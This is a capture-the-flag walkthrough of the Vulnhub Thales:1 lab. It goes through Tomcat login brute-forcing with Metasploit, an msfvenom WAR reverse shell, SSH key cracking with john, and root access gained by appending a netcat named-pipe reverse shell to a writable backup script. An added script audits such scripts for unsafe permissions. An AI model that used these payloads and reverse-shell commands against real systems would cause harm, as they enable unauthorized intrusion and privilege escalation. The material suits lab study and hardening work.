[Vulnhub Lab] THALES:1
2022-07-07 14:12:00 [Nailaoyyds]
Preface
Description
Introduction: Open your eyes and change your perspective
Contains 2 flags: user.txt and root.txt.
Download link
https://download.vulnhub.com/thales/Thales.zip.torrent
0x00 Environment
kali 192.168.56.102
Thales target machine 192.168.56.101
I. Information gathering
0x00 arp-scan
arp-scan -I eth1 -l # scan the local network on this interface
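0x01 nmap scan
The scan found two network segments and it was not clear which one held the target, so both IPs were scanned with nmap
Ports 22 and 8080 are open
Visiting the site shows that a username and password are required
II. Exploitation
0x00 Using msfconsole
Search msf for tomcat login
Configure the payload
Username tomcat, password role1
Login successful
0x01 File upload
Looking through the available functions, an upload point was found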
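Use kali to generate a WAR file trojan for a reverse shell
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.102 lport=5555 -f war -o myshell.war
The upload succeeded; run it
III. Privilege escalation
0x00 Reverse shell
Listen on the port
Upgrade to an interactive shell
sudo -l # requires a password, which is unknown
The user Thales was found under the home directory
The `notes.txt` file mentions `/usr/local/bin/backup.sh`; view that file's contents
0x02 Dictionary brute force
Found a .ssh folder
Found a private key; ssh2john.py can turn it into a hash file for cracking
Convert the key with the ssh2john.py script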
/usr/share/john/ssh2john.py id_rsa > crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
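The cracked password is vodka06
Switch user
0x03 user.txt
View user.txt --- the first flag
notes.txt has root permissions, so there may be something in it
0x04 Reverse shell
backup.sh has execute permission, so a reverse shell can be written into it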
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 666 >/tmp/f" >> backup.sh
Editing the file replaces its contents outright, so append instead
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f" >> backup.sh
0x05 root.txt
Listen on 9999; a while after the line was written, the connection came in by itself
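Added example, not part of the original write-up: the step above depends on backup.sh being writable by a non-root user while something runs it with higher privileges. A hardening check for that condition, assuming GNU coreutils stat; the function name check_script and its arguments are hypothetical:

```sh
#!/bin/sh
# Added example: audit a script that is executed by a privileged account
# (for instance a scheduled backup.sh) for unsafe ownership or write bits.
# Assumes GNU coreutils stat; check_script is a hypothetical helper name.

# check_script PATH [EXPECTED_UID]
# Prints one line per finding. Returns 0 when clean, 1 on findings,
# 2 when PATH does not exist. EXPECTED_UID defaults to 0 (root).
check_script() {
    path=$1
    want_uid=${2:-0}
    rc=0
    [ -e "$path" ] || { echo "MISSING $path"; return 2; }
    # Check the script and its parent directory: write access to the
    # directory is enough to swap the file out. Sticky-bit directories
    # are flagged as well, which is deliberately conservative.
    for target in "$path" "$(dirname "$path")"; do
        uid=$(stat -c '%u' "$target")
        mode=$(stat -c '%a' "$target")
        if [ "$uid" != "$want_uid" ]; then
            echo "OWNER $target is owned by uid $uid, expected $want_uid"
            rc=1
        fi
        # 020 = group write, 002 = other write (mode is read as octal)
        if [ $(( 0$mode & 022 )) -ne 0 ]; then
            echo "WRITABLE $target has mode $mode (group/other write)"
            rc=1
        fi
    done
    return $rc
}

# Stand-alone use: sh check_script.sh /usr/local/bin/backup.sh
if [ "$#" -gt 0 ]; then
    check_script "$@"
fi
```

A finding on either line is fixed with chown root:root and chmod 755 (or stricter) on the script and its directory.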
Summary
What I learned from Thales
Using msf brute-force dictionaries
Making use of an encrypted RSA private key